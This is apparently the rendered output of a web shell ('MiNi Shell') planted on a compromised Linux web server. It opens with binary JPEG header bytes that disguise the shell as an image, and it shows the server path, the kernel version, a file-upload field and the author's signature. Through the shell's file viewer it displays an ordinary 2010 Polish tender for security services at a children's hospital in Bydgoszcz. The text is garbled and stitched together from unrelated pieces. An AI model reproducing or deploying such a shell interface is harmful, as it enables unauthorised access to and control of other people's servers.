JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101125/337139-N-2010.html

<p class="kh_header"><b>Bydgoszcz: Na wykonanie usług pod nazwą Usługa ochrony obiektów Wojewódzkiego Szpitala Dziecięcego i Wojewódzkiego Ośrodka Rehabilitacji dla Dzieci w Bydgoszczy</b><br>
<b>Numer ogłoszenia: 337139 - 2010; data zamieszczenia: 25.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Dziecięcy im. J.Brudzińskiego , ul. Chodkiewicza 44, 85-667 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3262100, faks 052 3262101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wsd.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Na wykonanie usług pod nazwą Usługa ochrony obiektów Wojewódzkiego Szpitala Dziecięcego i Wojewódzkiego Ośrodka Rehabilitacji dla Dzieci w Bydgoszczy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa ochrony obiektów : Wojewódzkiego Szpitala Dziecięcego przy ul: Chodkiewicza 44 w Bydgoszczy i Wojewódzkiego Ośrodka Rehabilitacji dla Dzieci przy ul. Gajowej 24a w Bydgoszczy

Ochrona obiektów

1. całodobowa ochrona obiektów Szpitala (jeden posterunek osobowy przy bramie wjazdowej do Szpitala) i  monitoring elektroniczny obiektu przy ul. Gajowej 24a ( od 2100 do 600). W związku z rozbudową szpitala zamawiający może zlecić dodatkowo ochronę w ramach kwoty zamówienia do 48 godzin miesięcznie /np. przy bramie pożarowej/. Ochrona ta nie będzie dodatkowo płatna.
2. nadzór nad  prawidłowym zabezpieczeniem obiektu, kontrola terenu, sprawdzanie    zabezpieczenia pomieszczeń magazynowych, okien idrzwi wejściowych do budynków 
3.obsługa lokalnych systemów  alarmowych
4.czuwanie nad prawidłowym zabezpieczeniem jednostki pod względem antywłamaniowym (kontrola systemu uzbrajania pomieszczeń), prowadzenie rejestru systemu uzbrajania
5.obsługa bramy wjazdowej - kontrola pojazdów, udostępnianie wjazdu i wyjazdu (karetek pogotowia, policji, patrolu interwencyjnego, pojazdów dostawczych, pojazdów pracowników Szpitala posiadających przepustki wjazdowe)
6.obsługa interesantów, informowanie i kierowanie do poszczególnych komórek organizacyjnych Szpitala w godzinach urzędowania administracji Szpitala
7.kierowanie osób odwiedzających chorych na poszczególne oddziały
8.prowadzenie raportu dobowego z dokładnym opisem zaistniałych sytuacji
9.przyjęcie i wydawanie kompletów kluczy od wszystkich pomieszczeń, prowadzenie ewidencji wydanych i przyjmowanych kpl. kluczy
10.przekazywanie kopii miesięcznych grafików dyżurów kierownikowi administracyjnemu Zamawiającego
11.zainstalowanie 2 rogatek  wjazdowych na terenie szpitala. Obie obsługiwane przez portiera, rogatka nr 2 dodatkowo wyposażona w domofon i 15 pilotów oraz ich konserwacja i naprawa.
12.zainstalowanie elektronicznego systemu kontroli pracy pracowników ochrony (elektroniczny czytnik obchodów - min. 4 szt. na terenie Szpitala i  min 1 szt. w obiekcie przy ul: Gajowej 24a ) w ciągu 7 dni licząc od dnia obowiązywania umowy
13.zainstalowanie 12 szt. kamer telewizji przemysłowej na terenie obiektu Szpitala  w ciągu 7 dni licząc od dnia obowiązywania umowy, z których obraz będzie przekazywany i rejestrowany w sposób ciągły cyfrowo do pomieszczenia portierni oraz dodatkowego pomieszczenia wskazanego przez Zamawiającego. Zapis należy przechowywać przez okres 1 tygodnia. Kamery połączone są z centrum monitorowania (portiernia) za pomocą kabla. 
14.zainstalowanie 12 kamer na oddziałach Szpitalnych, których obraz będzie przekazywany i rejestrowany w sposób ciągły  cyfrowo do pomieszczenia dyżurnej pielęgniarki każdego z oddziałów. Zapis należy przechowywać przez okres 1 tygodnia.
15.Zainstalowanie 2 kamer na zewnątrz i 3 wewnątrz budynku Wojewódzkiego Ośrodka Rehabilitacji dla Dzieci przy ul. Gajowej 24a w Bydgoszczy. Zapis należy przechowywać przez okres 1 tygodnia.
16.obiekty Szpitala powinny być oznaczone w sposób stały ( naklejki samo przylepne ) informujące o monitoringu
17.Wymagane jest posiadanie licencji przez pracownika zatrudnionego na strzeżonym obiekcie,  jednakowego umundurowania z logo firmy świadczącej usługi ochrony, posiadanie  pilota antynapadowego.
18.Konieczność przeprowadzenia wizji lokalonej.
19.podłączenie istniejących instalacji alarmowych (na terenie Szpitala i w obiekcie przy ul. Gajowej 24a) do zintegrowanego systemu powiadamiania radiowego wykonawcy usługi
20.do zadań  grupy interwencyjnej należeć będzie oprócz każdorazowego stawienia się na wezwanie w ciągu max. 10 min. licząc od chwili zgłoszenia, również prowadzenie patroli prewencyjnych na terenie siedziby Zamawiającego (tereny zewnętrzne i w obiektach) i obiektu przy ul. Gajowej 24a min. 3 (trzy) razy w dni robocze w godzinach między 21:00 - 6:00 i 6 (sześć) razy na dobę w czasie świąt i weekendów, proporcjonalnie w dzień i w nocy.
21.Po zakończeniu czasu trwania umowy wykonawca może zdemontować zainstalowane urządzenia i zabrać (kamery, monitory, systemy do nagrywania, elektroniczne czytniki, zaporę wjazdową), gdyż nie są one własnością Zamawiającego

System antywłamaniowy i jego konserwacja

- Konserwacji podlegają urządzenia i instalacja systemu antywłamaniowego.
- System antywłamaniowy winien być monitorowany drogą radiową .
- Konserwacji podlegają urządzenia i instalacja antywłamaniowa znajdująca się w budynkach:
- w budynku D  - 2 systemy
- w budynku E  - 4 systemy
- w budynku F - 1 system
- w budynku przy ul. Gajowej 24a - 1 system

 - Konserwacji podlegają urządzenia pod kątem:
-  utrzymania stałej gotowości systemu antywłamaniowego
-  prawidłowego funkcjonowania systemu antywłamaniowego
-  regulacja czujek, sygnalizatorów
-  prawidłowego funkcjonowania zasilania awaryjnego
-  sprawdzanie okablowania
-  sprawdzenie ,regulacja urządzeń do transmisji radiowej
-  usuwanie usterek bez kosztów  urządzeń podlegających wymianie ( np. czujki )
- w kosztach konserwacji należy uwzględnić koszty dojazdu.

- Monitoring urządzeń i instalacji antywłamaniowej poprzez transmisję drogą radiową
- utrzymanie w stałej gotowości urządzenia do transmisji zagrożeń drogą radiową
- sprawdzanie prawidłowości funkcjonowania zasilania awaryjnego (akumulatorów)
- sprawdzenie całości okablowania
- prawidłowości działania  urządzenia do transmisji radiowej

 - W kosztach abonamentu: należy uwzględnić koszty związane z uruchomieniem pasma radiowego w urządzeniu do transmisji zagrożeń drogą radiową, konserwacja, opłata za monitoring , usunięcie awarii, oraz wszystkie zmiany adaptacyjne związane z prowadzeniem prac budowlanych na nowym obiekcie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O  udzielenie zamówienie mogą ubiegać się Wykonawcy którzy, spełniają   dotyczące: posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy nakładają obowiązek ich posiadania:
-  koncesji wydanej przez Ministra właściwego Spraw  Wewnętrznych na prowadzenie usług ochrony  osób i mienia z dnia 22.08.1997 r. (tekst jednolity Dz. U. z 2005 r. Nr 145, poz. 1221. z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełnienia przez Wykonawcę szczególnych warunków w tym zakresie, wystarczy złożenie oświadczenia o spełnianiu tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,dotyczące dysponowania potencjałem technicznym,
- posiada  własną grupę interwencyjną gotową w ciągu max. 10 min.  od wezwania dotrzeć do siedziby  Zamawiającego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,dotyczące dysponowania osobami zdolnymi do wykonania zamówienia,. 
 na podstawie oświadczenia o przydzieleniu do wykonania  zamówienia osób z aktualnym świadectwem niekaralności ,wymaganymi uprawnieniami, w tym dot. Licencji pracownika ochrony oraz dysponowaniu grupą interwencyjną</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- sytuacji ekonomicznej i finansowej; (tj. przedłożą opłaconą polisę ubezpieczeniową, a w przypadku jej braku inny dokument potwierdzający że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100 000 PLN)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Oświadczenie stwierdzające , iż pracujący na terenie Zamawiającego pracownicy firmy ochrony mienia i osób będą:
- zatrudnieni na umowę o pracę 
 - posiadać będą  jednakowe umundurowanie z logo firmy
 - posiadać będą pilot antynapadowy
2. Oświadczenie wykonawcy, iż posiada własną grupę interwencyjną i że jest ona w stanie max. w ciągu 10 min. stawić się na interwencję w siedzibie Zamawiającego oraz że będzie  przynajmniej 3 (trzy) razy dziennie w godzinach między 2100- 600 i 6 (sześć) razy na dobę w  czasie świąt i weekendów, proporcjonalnie w dzień i w nocy.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany stawki VAT, w ramach niniejszej umowy zmiana ta następuje z 
 dniem wejścia w życie aktu prawnego zmieniającego stawkę, przy czym zmianie ulegnie  wyłącznie cena brutto, a cena netto pozostanie bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wsd.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Dziecięcy im. J. Brudzińskiego w Bydgoszczy ,ul. Chodkiewicza 44, w budynku D I piętro pok. nr 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2010 godzina 09:45, miejsce: Wojewódzki Szpital Dziecięcy im. J. Brudzińskiego w Bydgoszczy ,ul. Chodkiewicza 44, w budynku D I piętro, sekretariat Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com